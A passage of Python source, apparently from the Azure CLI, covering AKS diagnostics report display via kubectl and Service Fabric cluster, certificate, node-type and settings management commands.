sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
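# Return the storage account id configured in the first diagnostic setting of the AKS cluster,
# or None when no diagnostic settings exist.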
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
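# Poll the aks-periscope diagnostic custom resources with kubectl and, once every ready node has
# reported, print the per-node network configuration and outbound connectivity results as tables.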
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
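# Colorize diagnostic status strings: red when the status reports an error, green otherwise.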
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter',
'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
'WindowsServer2019Datacenter': "2019-Datacenter",
'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return cluster_list
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
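# Create a new Service Fabric cluster. The command validates the certificate/template parameter
# combinations, ensures the resource group and key vault exist, creates or imports the cluster
# certificate, then deploys either the built-in template or the user-supplied template/parameter
# files via an ARM deployment.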
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'One of \'--certificate-subject-name\', \'--certificate-file\' or \'--secret-identifier\' must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' cannot be specified at the same time')
if secret_identifier:
if certificate_output_folder or certificate_file or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\', \'--certificate-file\', \'vault_resource_group_name\' and \'certificate_password\' cannot be specified ' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('When deploying with a custom template, both \'--parameter-file\' and \'--template-file\' must be specified. ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\', \'vm_sku\', \'vm_os\' and \'vm_user_name\' cannot be specified when deploying with a custom template')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' must be specified')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
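# Recursively flatten an error and its nested details into a list of readable 'Code'/'Message' strings.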
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, None, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.append(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.client_certificate_common_names
if thumbprints and not isinstance(thumbprints, list):
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list):
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
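# Add a secondary cluster certificate: create or import the certificate in key vault, register it
# as the secondary certificate in the Service Fabric VM extension, install it on all scale sets,
# and patch the cluster resource with the new secondary thumbprint.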
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
# add cert to sf extension
import json
secondary_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext.settings["certificateSecondary"] = secondary_setting
# add cert and start vmss update
_add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url)
# cluster update
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if vmss.sku.capacity < reliability_required_instance_count:
raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
cluster.reliability_level,
reliability_required_instance_count))
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
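# Update the durability level of a node type, keeping the cluster resource and the Service Fabric
# VM extension settings on the backing scale set in sync.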
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
# get cluster node type durability
cluster = client.get(resource_group_name, cluster_name)
node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_type_refs:
raise CLIError("Failed to find the node type in the cluster.")
node_type_ref = node_type_refs[0]
curr_node_type_durability = node_type_ref.durability_level
# get vmss extension durability
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
fabric_ext_ref = _get_sf_vm_extension(vmss)
if fabric_ext_ref is None:
raise CLIError("Failed to find service fabric extension.")
curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
# check upgrade
if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
logger.warning(
"The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
curr_node_type_durability,
curr_vmss_durability_level)
# update cluster node type durability
if curr_node_type_durability.lower() != durability_level.lower():
node_type_ref.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(update_cluster_poll)
# update vmss sf extension durability
if curr_vmss_durability_level.lower() != durability_level.lower():
fabric_ext_ref.settings['durabilityLevel'] = durability_level
fabric_ext_ref.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Use either \'--settings-section-description\' or the combination of \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\', \'--parameter\' and \'--value\' must all be specified')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Use either \'--settings-section-description\' or the combination of \'--section\' and \'--parameter\' to remove the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if not node_types:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto-add-node to automatically increase the number of nodes. {} requires {} nodes, but currently there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=cluster.node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 support Gold durability; please set --vm-sku to one of these values')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("node type {} already exists in the cluster".format(node_type))
_create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
_add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
